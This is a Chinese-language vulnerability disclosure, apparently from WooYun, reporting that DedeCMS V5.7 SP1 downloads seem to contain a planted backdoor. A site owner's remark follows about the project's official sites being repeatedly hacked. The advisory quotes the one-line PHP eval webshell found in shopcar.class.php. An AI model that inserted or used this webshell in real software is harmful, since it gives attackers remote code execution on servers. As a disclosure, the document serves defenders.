Dedecms 疑似被植入后门，织梦 v5.7 或有后门存在！

漏洞概要

缺陷编号：WooYun-2012-05416

漏洞标题：Dedecms疑似被植入后门

相关厂商：Dedecms

漏洞作者：jsbug

提交时间：2012-03-20

公开时间：2012-03-20

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：10

漏洞状态：联系到厂商或者厂商积极忽略

漏洞来源：http://www.wooyun.org

Tags标签：无

漏洞详情

披露状态：

2012-03-20：积极联系厂商并且等待厂商认领中，细节不对外公开

2012-03-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明：

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

Dedecms 疑似被植入后门，织梦 v5.7 或有后门存在！

站长评论：

Dedecms （织梦）、Dz 等开源程序官网被黑不是一两次了，并且N个人都保留有权限……

很明显这是某人故意放的……

大家都懂，不多说……

文章目录